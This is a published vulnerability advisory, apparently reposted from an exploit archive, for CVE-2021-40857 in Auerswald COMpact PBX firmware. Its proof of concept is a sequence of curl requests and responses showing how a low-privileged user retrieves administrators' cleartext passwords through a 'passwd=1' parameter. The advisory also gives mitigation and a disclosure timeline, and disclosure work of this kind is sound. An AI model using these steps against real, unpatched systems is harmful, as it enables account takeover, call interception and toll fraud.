Auerswald COMpact 8.0B – Privilege Escalation

  • 作者: RedTeam Pentesting GmbH
    日期: 2021-12-06
  • 类别:
  • 来源:
  • # Exploit Title: Auerswald COMpact 8.0B - Privilege Escalation
    # Date: 06/12/2021
    # Exploit Author: RedTeam Pentesting GmbH
    Advisory: Auerswald COMpact Privilege Escalation
    RedTeam Pentesting discovered a vulnerability in the web-based
    management interface of the Auerswald COMpact 5500R PBX which allows
    low-privileged users to access passwords of administrative user accounts.
    Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
    Affected Versions: <= 8.0B (COMpact4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))
    Fixed Versions: 8.2B
    Vulnerability Type: Privilege Escalation
    Security Risk: high
    Vendor URL:
    Vendor Status: fixed version released
    Advisory URL:
    Advisory Status: published
    CVE: CVE-2021-40857
    CVE URL:
    "Fully modular VoIP appliance for more efficient communication processes
    With the COMpact 5500R, you are originally equipped for everyday
    business - now and in the future.
    The fully modular architecture with 80 IP channels and all the functions
    of a large ITC server allows up to 112 subscribers and thus scales with
    your company.
    Continuous maintanance and expansion of the system software makes this
    versatile IP server a future-proof investment in any business
    (from the vendor's homepage)
    More Details
    Attackers with low-privileged user accounts, for example those that are
    used by VoIP phones, can log into the web-based management interface of
    the COMpact 5500R PBX. Afterwards, the list of user accounts can be
    listed and details shown for each user account. Adding the URL parameter
    "passwd=1" then also includes the clear text password for each user
    account, including administrative ones, which can then be used to
    authenticate against the management interface.
    Proof of Concept
    The command-line HTTP client curl[1] can be used as follows to log in
    with the username "123" and the password "secret" (shortened and
    formatted to increase readability):
    $ curl --anyauth --user 123:secret --include
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    Set-Cookie: AUERSessionID1234123412=SNKIFTVQBGDRFJB; HttpOnly; Path=/
    "login": 1,
    "userId": 1234,
    "userRufNr": "123",
    "userName": "123",
    "pbxType": 35,
    "pbxId": 0,
    "pbx": "COMpact 5500R",
    "pbxEdit": "Comp.5500R",
    "isActivated": 1,
    "dongleTnCount": 112,
    "currentConfig": 34,
    "cur": "EUR",
    "language": 0,
    "hidePrivat": 1,
    "offlineConfig": false
    The server returns a JSON document describing the user account as well
    as a session ID in a cookie. This session ID can then be used to access
    other API endpoints on the PBX. The following listing shows the request to
    the path "/logstatus_state", which returns the current access level:
    $ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    The access level in this case is "Teilnehmer" (member).
    The list of all other users can be requested as follows:
    $ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    {"id":1234,"nr":"123","name":"Example User","isSubAdmin":false},
    {"id":2222,"nr":"555","name":"sub-admin other user","isSubAdmin":true}
    Two user accounts are shown in the listing above: the current user's
    account with the ID 1234 and a different user account with so-called
    "sub-admin" privileges with the ID 2222.
    Details about a particular user account with a given ID can be requested
    like this:
    $ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    {"rufnr":"123","name":"Example User",[...],
    [...], "isSubadmin":0,[...]}
    In the returned JSON document, the values of the fields for the PIN,
    token and password are replaced by "XXX". But if the URL parameter
    "passwd" is set to the value 1, the values are returned in plain text:
    $ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    {"rufnr":"123","name":"Example User",[...],
    "privatToken":"yyyyyyyyyyyyy",[...], "isSubadmin":0,[...]}
    This can be repeated for other user accounts, for example for the
    user account with the ID 2222 shown it the listing earlier. The server
    returns the plain text password for the other user account:
    $ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    {"rufnr":"555","name":"sub-admin other user","privatPin":"99999999",
    The password can then be used to log into the PBX with the other user
    $ curl --anyauth --user sub-admin:verysecretpassword --include \
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/
    Checking the access level with the new session ID shows that the user is
    now logged in with an administrative account:
    $ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    Disable or restrict access to the web-based management interface if
    Upgrade to a firmware version which corrects this vulnerability.
    Security Risk
    Attackers who have acquired access to a low-privileged user account, for
    example by extracting such an account from a VoIP phone, can log into
    the web-based management interface of the COMpact 5500R PBX and access
    clear text passwords for other user accounts, including those with the
    "sub-admin" privilege. After logging in with these newly acquired
    credentials, attackers can access configuration settings and most other
    They can then for example create new SIP credentials and use them to
    call premium rate phone lines they operate to generate revenue. They can
    monitor and even redirect all incoming and outgoing phone calls and
    record all Ethernet data traffic.
    Due to the severe and far-reaching consequences and despite the
    prerequisite of having to know an existing low-privilege user account,
    this vulnerability rated as a high risk.
    2021-08-26 Vulnerability identified
    2021-09-01 Customer approved disclosure to vendor
    2021-09-10 Vendor notified
    2021-09-10 CVE ID requested
    2021-09-10 CVE ID assigned
    2021-10-05 Vendor provides access to device with fixed firmware
    2021-10-11 Vendor provides fixed firmware
    2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
    2021-12-06 Advisory published
    RedTeam Pentesting GmbH
    RedTeam Pentesting offers individual penetration tests performed by a
    team of specialised IT-security experts. Hereby, security weaknesses in
    company networks or products are uncovered and can be fixed immediately.
    As there are only few experts in this field, RedTeam Pentesting wants to
    share its knowledge and enhance the public knowledge with research in
    security-related areas. The results are made available as public
    security advisories.
    More information about RedTeam Pentesting can be found at:
    Working at RedTeam Pentesting
    RedTeam Pentesting is looking for penetration testers to join our team
    in Aachen, Germany. If you are interested please visit:
    RedTeam Pentesting GmbH Tel.: +49 241 510081-0
    Dennewartstr. 25-27 Fax : +49 241 510081-99
    52068 Aachen
    Germany Registergericht: Aachen HRB 14004
    Geschäftsführer: Patrick Hof, Jens Liebchen